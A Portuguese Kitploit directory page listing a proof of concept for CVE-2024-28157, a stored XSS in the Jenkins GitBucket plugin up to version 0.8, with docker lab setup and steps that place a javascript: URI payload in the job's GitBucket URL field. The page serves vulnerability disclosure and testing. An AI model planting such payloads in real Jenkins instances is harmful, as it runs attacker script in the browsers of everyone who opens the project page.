Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
PoC_CVE-2024-28157 — PoC para (CVE-2024-28157) XSS Armazenado no Plugin GitBucket do Jenkins <= 0.8 | Kitploit
Ferramentas/GitHubGitHub/jayesh-dev21/poc_cve-2024-28157
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubjayesh-dev21/poc_cve-2024-28157

PoC_CVE-2024-28157

PoC para (CVE-2024-28157) XSS Armazenado no Plugin GitBucket do Jenkins <= 0.8

Ver Repositório
1há 20h 15mAinda não revisado
Site

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-28157 - XSS Armazenado no Plugin GitBucket do Jenkins <= 0.8

O campo URL do GitBucket na configuração do job não é sanitizado. Defini-lo como um URI javascript: armazena o payload e o executa no navegador de qualquer visitante quando este abre a página de status do projeto.

Relatório https://report-cve-2024-28157.vercel.app/

Configuração

root@kitploit:~
bash poc/download-plugins
docker compose up --build

O Jenkins é executado em http://localhost:8080 Desbloqueie com a senha de administrador de: docker compose logs jenkins

Reproduzir

  1. Crie um projeto Freestyle
  2. Configure > GitBucket > URL: javascript:alert(7*7)
  3. Salve e visite a página do projeto
  4. O alerta dispara com 49 (7*7)

As capturas de tela estão em poc/screenshots/

Referências

NVD https://nvd.nist.gov/vuln/detail/CVE-2024-28157

Baixar ferramenta